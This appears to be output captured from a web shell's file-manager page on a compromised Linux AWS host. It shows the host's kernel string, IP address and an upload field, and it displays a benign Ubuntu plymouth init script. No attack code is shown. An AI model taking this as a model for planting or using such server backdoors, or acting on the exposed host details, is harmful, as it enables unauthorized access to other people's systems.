0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.191.68.112


Current Path : /proc/thread-self/root/snap/core22/1663/lib/lsb/init-functions.d/
Upload File :
Current File : //proc/thread-self/root/snap/core22/1663/lib/lsb/init-functions.d/99-plymouth

# /lib/lsb/init-functions.d/99-plymouth

# Abort sourcing of this file if plymouth isn't active
if ! plymouth --ping > /dev/null 2>&1
then
	return
fi

log_begin_msg_post ()
{
	/usr/bin/plymouth update --status="${@}" || true
 }

log_end_msg_post ()
{
	:
}

log_action_begin_msg_post ()
{
	/usr/bin/plymouth update --status="${@}" || true
}

log_action_end_msg_post ()
{
	:
}

log_action_msg_post ()
{
	/usr/bin/plymouth update --status="${@}" || true
}

log_daemon_msg_post ()
{
	/usr/bin/plymouth update --status="${@}" || true
}